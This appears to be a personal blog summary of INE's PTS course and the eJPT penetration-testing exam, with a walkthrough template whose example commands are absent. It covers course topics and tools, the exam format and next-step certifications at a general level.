eJPT Summary

Introduction eJPT

I highly encourage any one trying to break into pentesting to take the PTS course provided be INE. This course will teach you about Reconnaissance, Enumeration, Metasploit, Building Payloads, Exploits, Pioting, Cyber Secuirty Frameworks, Open Source Resources, and different techniques that are useful for an Introduction into penetration testing. You will get to utilize tools in a sandboxed environment while learning from Alexis Ahmed in detail whats going on. If you truly are a beginner like i was, stuff will start clicking as you continue deeper into the course, and utilize other resources.

In this course you will set up postgresql database with MSFconsole for creating a smooth workflow, brute force services to enumerate user credentials, learn protocols, utilize nmap in different ways to get more information about systems depending on firewalls and other variables, exploit machines using MSFconsole, learn pivoting basics, Crack hashes, whois, google dorks, Web Developer tools, etc. I hope you enjoy this course as much as I did. There is over 150 hours of contenet for eJPTV2

Target Information

Target URL/Host: www.example.com

Description: A brief description of the target, including the environment, network configuration, and any relevant background info.

Tools Used

Pentesting Walkthrough

Step 1: Reconnaissance

In this phase, we collect as much information as possible about the target to plan our next steps. We use tools like nmap for network scanning and whois to gather domain information.

Step 2: Scanning and Enumeration

Here we identify open ports, services, and potential vulnerabilities. For example:

We can also use dirb for directory enumeration on Web Server's:

If HTTP Servers are Identified we can also use tools like

Step 3: Exploitation

Once we have identified vulnerabilities, we attempt exploitation. In this example, we use Metasploit to exploit a vulnerable service.

You may also try utilizing MSFvenom to create payloads

Step 4: Post-Exploitation

After successfully exploiting the target, we maintain access or gather additional information. We can use Meterpreter to explore the compromised system further.

In this exam, you will have the chance to try to dump hashes, crack hashes, pivot, and enumerate more information. You will be given a couple fiags to track down for answering a few questions.

Results

Here we provide a summary of the results from our pentesting efforts. This includes any successful exploits, data accessed, and any issues discovered during the testing.

When going into the eJPT PTS exam you can expect to see everything in the course, but a notch higher in difficulty. You will have 48 hours to compromise a few machines and enumerate a subnet. You have 35 questions to answer regarding different vectors, a few CTF's, credentials, and exploits utilized to compromise machines. You should come out of this exam with your head held high knowing that if you passed you now have the ability to dive deeper into other courses with a good bseline understanding of whats going on. You have utilized tools and mutliple techniques that are relevant to penetration testing in the real world

Conclusion

After completing the penetration test, we conclude with recommendations for securing the system and improving the target's overall security posture. This was just a sandboxed environment for an exam. From here moving forward, I would encourage utilizingt other platforms to excercise and enhance your skills. You can continue moving forward with INE's eCPPT & eWPT courses or feel free to check out